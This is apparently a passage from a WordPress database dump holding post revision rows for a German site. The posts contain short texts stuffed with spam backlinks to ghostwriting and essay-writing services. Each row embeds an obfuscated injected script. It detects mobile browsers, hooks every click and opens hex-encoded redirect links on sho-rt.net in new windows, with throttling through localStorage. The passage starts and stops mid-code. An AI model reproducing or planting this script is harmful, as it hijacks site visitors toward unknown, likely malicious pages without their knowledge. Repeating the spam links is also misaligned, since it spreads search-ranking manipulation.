_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-05-06 15:40:16','2023-05-06 15:40:16','',3670,'https://gsw2023.com/?p=4295',0,'revision','',0),
(4301,1,'2023-05-07 02:30:16','2023-05-07 02:30:16','<p>Die Einstellung eines Ghostwriters zum Schreiben Ihres Buches ist eine Investition, die Sie sorgfältig berücksichtigen müssen. Ein Ghostwriter sollte genug bezahlt werden, um seine Lebenshaltungskosten <a href=\"https://premiumghostwriter.de/preise/\">ghostwriter kosten</a> und einen angemessenen Anteil an Lizenzgebühren zu decken.</p>[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]<p>Hausaufgaben sind ein wichtiger Weg, um das zu verstärken, was die Schüler in der Schule lernen. Es kann ihnen auch helfen, das zu üben, was sie gelernt haben, und neue neuronale <a href=\"https://hausarbeiten-schreiben-lassen.com/\">hausarbeit schreiben lassen</a> Verbindungen herzustellen.Hausaufgaben können jedoch schwer zu managen sein. Zum Glück gibt es Möglichkeiten, es einfacher zu machen.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-05-07 02:30:16','2023-05-07 02:30:16','',3670,'https://gsw2023.com/?p=4301',0,'revision','',0),
(4330,1,'2023-05-07 21:06:21','2023-05-07 21:06:21','<p>Wissenschaftliches Schreiben ist ein entscheidender Bestandteil der Forschungskommunikation. Es erfordert Präzision (die genaue Verwendung von Wörtern und Phrasen), Klarheit <a href=\"https://arbeitschreibenlassen.com/ \">wissenschaftliche arbeit schreiben lassen</a> und Wirtschaft.Leider ist das Schreiben von Wissenschaft oft ein vernachlässigter Schritt im Prozess der wissenschaftlichen Entdeckung und Veröffentlichung. Die Qualität dieses Schreibens kann jedoch tiefgreifende Auswirkungen darauf haben, wie gut die Wissenschaft verstanden und geteilt wird.</p><p>Die Einstellung eines Ghostwriters zum Schreiben Ihres Buches ist eine Investition, die Sie sorgfältig berücksichtigen müssen. Ein Ghostwriter sollte genug bezahlt werden, um seine Lebenshaltungskosten <a href=\"https://premiumghostwriter.de/preise/\">ghostwriter kosten</a> und einen angemessenen Anteil an Lizenzgebühren zu decken.</p>[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]<p>Hausaufgaben sind ein wichtiger Weg, um das zu verstärken, was die Schüler in der Schule lernen. Es kann ihnen auch helfen, das zu üben, was sie gelernt haben, und neue neuronale <a href=\"https://hausarbeiten-schreiben-lassen.com/\">hausarbeit schreiben lassen</a> Verbindungen herzustellen.Hausaufgaben können jedoch schwer zu managen sein. Zum Glück gibt es Möglichkeiten, es einfacher zu machen.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 